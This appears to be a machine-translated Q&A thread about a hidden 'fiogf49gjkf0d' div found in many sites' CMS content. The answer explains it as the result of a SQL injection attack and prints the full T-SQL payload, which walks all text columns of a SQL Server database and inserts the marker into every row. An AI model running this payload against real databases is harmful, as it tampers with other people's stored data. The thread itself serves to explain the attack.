我们注意到许多网站都在其CMS中包含此内容:
< div style =“display:none”> fiogf49gjkf0d< / div>
有谁知道这意味着什么或来自哪里?
答案 0 :(得分:3)
我做了一些研究,我相信这是SQL注入漏洞的结果。这是我发现的有问题的有效载荷:
tho;
declare @c cursor;
set @c=cursor for select TABLE_NAME,c.COLUMN_NAME FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS c ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%text';
declare @a varchar(99);
declare @s varchar(99);
declare @f varchar(99);
declare @sql varchar(8000);
open @c;
fetch next from @c into @a,@s;
while @@FETCH_STATUS=0 begin set @sql='declare @f binary(16);
declare @x cursor;
set @x=cursor for SELECT TEXTPTR([' @s ']) FROM [' @a '] where not [' @s '] like ''%fiogf49gjkf0d%'';
open @x;
fetch next from @x into @f;
while @@FETCH_STATUS=0 begin declare @sql varchar(8000);
set @sql=''UPDATETEXT [' @a '].[' @s '] '' master.dbo.fn_varbintohexstr(@f) '' 0 0 '''''' char(60) ''div style="display:none"'' char(62) ''fiogf49gjkf0d'' char(60) char(47) ''div'' char(62) '''''''';
exec(@sql);
fetch next from @x into @f;
end;
close @x';
exec(@sql);
fetch next from @c into @a,@s;
end;
close @c--
我的猜测是机器人使用SQL Server对网站执行此操作。有效负载基本上将枚举所有表/列,如果列的类型为*text,则它将插入签名。